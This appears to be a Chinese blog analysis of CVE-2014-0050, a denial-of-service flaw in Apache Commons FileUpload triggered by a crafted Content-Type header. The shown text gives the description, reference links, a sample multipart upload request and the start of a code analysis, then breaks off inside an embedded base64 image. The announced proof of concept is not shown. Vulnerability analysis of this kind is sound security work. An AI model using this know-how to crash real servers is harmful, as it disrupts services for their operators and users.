catalog

. Description
. Analysis
. POC
. Solution

1. Description

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions
Apache Tomcat和JBoss Web中使用的Apache Commons FileUpload 1.3.1及之前版本中的MultipartStream.java文件存在安全漏洞。远程攻击者可借助特制的Content-Type header利用该漏洞造成拒绝服务(无限循环和CPU消耗)

Relevant Link:

http://cve.scap.org.cn/CVE-2014-0050.html
https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2014-0050
http://www.cnblogs.com/geekcui/p/3599425.html

2. Analysis

在最初的 http 协议中,没有上传文件方面的功能。 rfc1867 (http://www.ietf.org/rfc/rfc1867.txt) 为 http 协议添加了这个功能。客户端的浏览器,如 Microsoft IE, Mozila, Opera 等,按照此规范将用户指定的文件发送到服务器。服务器端的网页程序,如 php, asp, jsp 等,可以按照此规范,解析出用户发送来的文件
一个典型的multipart/form-data文件上传包格式如下

POST /upload_file/UploadFile HTTP/1.1
Accept: text/plain, */*
Accept-Language: zh-cn
Host: 192.168.29.65:80
Content-Type:multipart/form-data;boundary=---------------------------7d33a816d302b6
User-Agent: Mozilla/4.0 (compatible; OpenOffice.org)
Content-Length: 424
Connection: Keep-Alive -----------------------------7d33a816d302b6
Content-Disposition:form-data;
name="userfile1";
filename="E:\s"Content-Type:
application/octet-stream abbXXXccc
-----------------------------7d33a816d302b6 Content-Disposition: form-data; name="text1" foo -----------------------------7d33a816d302b6 Content-Disposition: form-data; name="password1" bar -----------------------------7d33a816d302b6--

可以看到,在multipart/form-data流中使用boundary进行分段,而boundary的具体内容在HTTP头部中给出

0x1: 漏洞代码分析

/commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/MultipartStream.java

aaarticlea/png;base64,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